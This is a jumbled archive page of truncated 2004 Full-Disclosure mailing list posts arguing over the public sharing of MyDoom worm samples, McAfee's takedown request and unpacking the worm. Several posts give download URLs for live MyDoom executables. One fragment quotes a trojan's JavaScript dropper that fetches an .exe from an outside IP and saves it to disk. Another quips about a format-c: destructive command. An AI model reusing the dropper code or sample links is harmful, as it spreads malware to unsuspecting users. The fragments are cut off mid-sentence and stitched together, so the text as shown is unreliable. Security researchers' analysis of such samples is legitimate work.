>
> Nick FitzGerald wrote:
>
> > And save me the almost inevitable full-disclosure mantra
> BS replies!
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.netsys.com/full-disclosure-charter.html
>
> heh.
>
>
Nick FitzGerald wrote:
And save me the almost inevitable full-disclosure mantra BS replies!
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
heh.
___
Ful
On Sun, 1 Feb 2004, Nick FitzGerald wrote:
> of it will "escape" (we see this often). And you want to subject the
> world to that threat because you want to spend hours and hours doing
> what has been done "well enough" in multiple professional security
> company labs for them to ship detection a
Nick FitzGerald wrote:
I know most of you will not believe this because you so stupid you
already believe that live virus samples are _just_ information and
therefore _should_ be subject to "full disclosure" (this is a special
form of ignorance that very little empirical evidence seems able to
Please allow me to clarify - I merely intended to indicate that I know
Dan to be a man of personal and professional integrity, no endorsement
of the practice was intended, sorry for any confusion.
On Jan 31, 2004, at 2:54 PM, Nick FitzGerald wrote:
Roland Dobbins <[EMAIL PROTECTED]> wrote:
I k
Doesn't work in Mozilla v1.3.1 on Xandros v1.1 either, though the
message was "(111) Connection refused" by
http://mitglied.lycos.de/mycutewebspace, maybe they don't like Mozilla?
:-)
Our proxy shows the following path when you click the link:
http://freedns.afraid.org/blank.html
http://mitglied.
Ergh - the http://207.46.110.24/gateway/gateway.dll? address is only a
MSN MSGR site - sorry.
Dan
-Forwarded Message-
From: Paul Schmehl <[EMAIL PROTECTED]>
To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO
Kurt Weiske <[EMAIL PROTECTED]> wrote:
> Daniel and Mike, thanks for making those files available for those of us
> who wish to research this virus firsthand, instead of relying on
> (sometimes) wildly innacurate media and "expert" reporting.
>
> Shame on McAfee for succeeding in intimidating a
Mike wrote:
That's unbelievable and incredibly lame of McAfee!!
Are we supposed to sit and wait for our free copies to be delivered to us by
the very people we are trying to stop from getting infected???
Daniel and Mike, thanks for making those files available for those of us
who wish to research
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Saturday 31 January 2004 16:37, Daniel Spisak wrote:
> Look, apparently this is not the list for me to be on. All I was trying
> to do at first was find B to analyze. Then I tried to provide it to
> people via email but that quickly escalated past w
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Look, apparently this is not the list for me to be on. All I was trying
to do at first was find B to analyze. Then I tried to provide it to
people via email but that quickly escalated past what I could
personally handle by myself. Then I gave the UR
On Sun, 1 Feb 2004, Thierry wrote:
> NF>that x employs people who think
> NF>there is integrity in both publicly
> NF>distributing viruses
>
> I read F u l l - D i s c l o s u r e
> not restricted Disclosure.
Exactly.
> Quit the whining and post something productive.
Here here!
--
Yours
On Sat, 31 Jan 2004 09:35:13 PST, [EMAIL PROTECTED] said:
> The only difference between a 'script kiddie' and 90% of the 'security
> experts' out there are the tools they use.
Damn, I've been outed. The average script kiddie probably has more
exploits on their hard drive than I do, I must be a
On Sun, 2004-02-01 at 06:08, Mike wrote:
> I have copied the files to the following locations:
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe
And so the virus spreads again. and by means not anticipated by its
author... Spre
Hi Daniel,
That's unbelievable and incredibly lame of McAfee!!
Are we supposed to sit and wait for our free copies to be delivered to us by
the very people we are trying to stop from getting infected???
I have copied the files to the following locations:
http://homepages.ihug.co.nz/~mjcarter/virus
NF>that x employs people who think
NF>there is integrity in both publicly
NF>distributing viruses
I read F u l l - D i s c l o s u r e
not restricted Disclosure.
I applaud the person who posted the B variant, for me the only chance
to "analyse" that one.
NF> after repackaging them with a "d
Hallo Steve,
* Steve Wray <[EMAIL PROTECTED]> [2004-01-31 23:00]:
> > You can always disassemble the virus, which is what people
> > will do if it's a real "popular" one such as MyDoom.
>
> IIRC there are viruses that are encrypted and are almost impossible
> to disassemble?
>
> Would that be
Roland Dobbins <[EMAIL PROTECTED]> wrote:
> I know Dan Spisak personally, and can vouch for his honesty and
> integrity.
And _you_ are???
It seems you largely missed the point.
...
Anyway, it is interesting to know that Cisco employs people who think
there is integrity in both publicly distr
On Sun, 01 Feb 2004 10:46:09 +1300, Steve Wray <[EMAIL PROTECTED]> said:
> but to address the points, as one person wrote, its difficult to spread
> fast when you are trying to be stealthy; I would argue that if one is
> stealthy enough, one doesn't need to spread fast since one is trying to
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of
> Steve Wray
> Sent: Sunday, 1 February 2004 10:46 a.m.
> To: 'Paul Schmehl'; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] MyDoom download info
>
> If a virus could spread slowly but stealthi
> [mailto:[EMAIL PROTECTED] On Behalf Of
> Paul Schmehl
>
> --On Saturday, January 31, 2004 12:25 PM -0500
> [EMAIL PROTECTED]
> wrote:
>
> > On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
> > <[EMAIL PROTECTED]> said:
> >
> > What worries me is we haven't seen *either* an actual damaging vir
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I have been asked by McAfee to take down my copy of MyDoom.B as they
have insinuated that I am now responsible for this virus spreading.
Sorry guys, I tried to help people out here but it would seem greater
powers are at work here. Don't email me as
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
So whats the difference between a script kiddie and a hacker in your
opinion? Would it be the same difference between the "cookie cutter"
security professionals and the actual professional? I'm curious.
[EMAIL PROTECTED] wrote:
The only differe
--On Saturday, January 31, 2004 12:25 PM -0500 [EMAIL PROTECTED]
wrote:
On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
<[EMAIL PROTECTED]> said:
What worries me is we haven't seen *either* an actual damaging virus
(imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format
c:);") or
--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron
<[EMAIL PROTECTED]> wrote:
The past Trojan horses which spread this way took advantage of the fact
web servers send an HTML 404 message if a file doesn't exist.
The original sample - britney.jpg - was simply an html file itself, and
using t
--On Saturday, January 31, 2004 3:44 PM -0500 "[EMAIL PROTECTED]"
<[EMAIL PROTECTED]> wrote:
Your mail to [EMAIL PROTECTED]; was filtered because of
the potential spam or virus keyword [gambling]
please contact the user by fax or telephone thank you.
For this email filter system and other power
> Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
> on any of the 6 public key servers I tried. Bonus points for (a) having
> a signature other than your own on the key, (b) having signatures to
> connect it into the "strongly-connected set", and (c) knowing what the
> stro
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- ---
Fedora Legacy Update Advisory
Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date:2004-01-31
Produc
Kinda wanted to take a minute to think about this.
The big determiner between art and junk is passion. Regardless of what you
do, if your a good information security person, or a good hacker, you have a
passion for the technology and the job. Doesn't really matter if you get
paid for it or not,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The only difference between a 'script kiddie' and 90% of the 'security
experts' out there are the tools they use.
They're both clueless but at least the 'script kiddie' didn't spend $5000
on ISS Hackcamp to learn his techniques.
-BEGIN PGP SIG
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- ---
Fedora Legacy Update Advisory
Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date:2004-01-31
Produc
Heres the other frame...
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://211.19.46.20/5.exe ",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\
The past Trojan horses which spread this way took advantage of the fact
web servers send an HTML 404 message if a file doesn't exist.
The original sample - britney.jpg - was simply an html file itself, and
using that fact, and IE loading it. It was combined with one of the
latest exploits of th
On Fri, 30 Jan 2004 17:07:12 PST, Daniel Spisak said:
> from, let alone the fact that I PGP sign all my email to this list?
Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
on any of the 6 public key servers I tried. Bonus points for (a) having
a signature other than your
On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]> said:
> I've often thought that none of the viruses so far encountered on the
> net are actually serious.
>
> What worries me are the viruses that have been around for a while
> and which have, so far, not been detected; these ar
I apologize if in my previous email I didn't make it clear, this is an
important issue for system administrators world wide, so I am emailing
again in regard to this subject alone - a time table for the Mydoom DDoS
attack.
In my post from the 30th of January with the subject: "Refuting
tall-ta
Hi,
> OK, this can readily be deducted somewhat from the mydoom.exe but not
> entirely. Ironically aladdin systems can find itself back in the worm's
> 'strings' output... a part of it is compressed with stuffit.
Are you looking at the files from the URLs posted yesterday? Those
were packed with
Hello last
2004. január 31., 13:07:27, írtad:
>> > It's still UPX packed, but it won't unpack with "UPX -d" because the
>>author
>> > used a simple UPX scrambler. Either undo what he did or unpack it
>>manually
This below VMware run and legalized this also we can at that time we be
aware of bec
mail me! :)
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434
Promote security and make money with the Hushmail Affili
Am Samstag, 31. Januar 2004 00:24 schrieb Remko Lodder:
> "all i can say is they have to start somewhere"
>
> --> That is why my friends and i started Mostly-Harmless,
> we educate those persons by telling them what is good and what
> is wrong, so we can convince them script kiddie is not good
> ha
I know Dan Spisak personally, and can vouch for his honesty and
integrity.
On Jan 30, 2004, at 4:38 PM, Scott Taylor wrote:
Am I the only one that found it to be a little bit shady that these
were
made available as executables? Is the "B" version posted somewhere as
just a plain zip? I don't se
Sophos says:
(sync-1.01; andy; I'm just doing my job, nothing personal, sorry)
OK, this can readily be deducted somewhat from the mydoom.exe but not
entirely. Ironically aladdin systems can find itself back in the worm's
'strings' output... a part of it is compressed with stuffit.
[download
Is it possible, that we never analyze the whole picture. And virii is much more
coordinated.
REST stands for REpresentational State Transfer, and is an architectural style for
large-scale software design.
REST suggests that what the Web got right is having a small, globally defined set of
remo
> >It actually un-UPX-ed just fine for me. What version have you been trying?
>
> MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you
> have to do it manually which shouldn't be a problem.
Oh, that clarifies it - I've just been looking at a copy of .A as it came to
me ama
> It's still UPX packed, but it won't unpack with "UPX -d" because the author
> used a simple UPX scrambler. Either undo what he did or unpack it manually
> and you'll see all the code.
It actually un-UPX-ed just fine for me. What version have you been trying?
It disassembled nicely after that.
> It's still UPX packed, but it won't unpack with "UPX -d" because the
author
> used a simple UPX scrambler. Either undo what he did or unpack it
manually
> and you'll see all the code.
It actually un-UPX-ed just fine for me. What version have you been trying?
MyDoom.B as posted by someone else
BTW, apparently there is a yet undiscovered bug in MyDoom.B code
that prevents it from spreading effectively. Much of the code is
encrypted, so dissecting processes sowly.
It's still UPX packed, but it won't unpack with "UPX -d" because the author
used a simple UPX scrambler. Either undo what he d
Hello,
>http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe
Run it under VMware and confirmed. Aladdin Stuffit format self-
extracting archive, contains MyDoom.B worm executable (29,184 bytes)
inside.
However the AV industry standard is always to send virus samples in
passworded ZIP archive
I think Daniel E. Spisak is quite right
why would anyone post a virus/backdoor creation of hiw
own?
Also if he wanted..he would have disributed in Executable form...not
the xipped one.right.
- Original Message -
From: "first last" <[EMAIL PR
49 matches
Mail list logo